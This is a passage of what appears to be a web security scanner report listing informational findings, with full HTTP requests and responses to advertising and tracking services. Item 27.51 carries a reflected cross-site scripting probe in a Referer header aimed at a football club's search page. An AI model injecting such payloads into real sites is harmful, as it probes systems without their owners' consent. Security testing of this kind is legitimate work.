Date: Sun, 02 Oct 2011 23:59:09 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

27.41. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

27.42. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2122

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

27.43. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

27.44. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /0/KantarMedia-Panel/panel/set_panel.html

Request

GET /0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football HTTP/1.1
Host: panel.kantarmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1967

<script type="text/javascript">
   var d=document;
   
   function cookie_check(ifd,ife){
    var s=ife.indexOf(ifd);
    if(s===-1)return "";
    s+=ifd.length;
    var e=ife.indexOf(";",s);
    if(e===
...[SNIP]...

27.45. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=101&exchange_id=9 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:59:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 02-Oct-2011 23:58:41 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...

27.46. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...

27.47. http://tags.bluekai.com/site/2565

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2565

Request

GET /site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111004%7C20111007&phint=u6=1&phint=u7=1%7C0&phint=u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers&phint=u11=35&phint=u13=4215&phint=u14=429&phint=u15= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111004%7C20111007;u2=178239;u6=1;u7=1%7C0;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u11=35;u13=4215;u14=429;u16=USD;ord=7232943603303.283?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:14 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: 160f
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>

27.48. http://tags.bluekai.com/site/2625

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2625

Request

GET /site/2625?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u3=&phint=u4=20111004%7C20111007&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=4215%7C15861%7C23415%7C1680030%7C2800816&phint=u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54&phint=u16=USD&phint=u20= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: f778
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>

27.49. http://uxm.thousandeyes.com/rest/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK

27.50. http://www.aon.com/manchesterunited/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/

Request

GET /manchesterunited/ HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/unitedin2010/?lid=aonbutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Length: 12997

<!DOCTYPE html>
<html lang="en">
   <head>
       <meta charset="utf-8" />
       <title> Aon and Manchester United: We are United </title>
       <link rel="stylesheet" href="styles.css" media="screen"/>
       <scr
...[SNIP]...

27.51. http://www.aon.com/unitedin2010/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /unitedin2010/

Request

GET /unitedin2010/?lid=aonbutton HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 103
Date: Sun, 02 Oct 2011 23:59:04 GMT

<SCRIPT LANGUAGE="JavaScript">
window.location.href="http://www.aon.com/manchesterunited/";
</script>

27.52. http://www.aon.com/unitedin2010/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /unitedin2010/index.jsp

Request

GET /unitedin2010/index.jsp HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/default.jsp%7C1317601819055%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/default.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/unitedin2010/index.jsp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 103
Date: Mon, 03 Oct 2011 00:01:31 GMT

<SCRIPT LANGUAGE="JavaScript">
window.location.href="http://www.aon.com/manchesterunited/";
</script>

27.53. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...

27.54. http://www.cheaptickets.com/cacheable/ad.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/ad.html

Request

GET /cacheable/ad.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
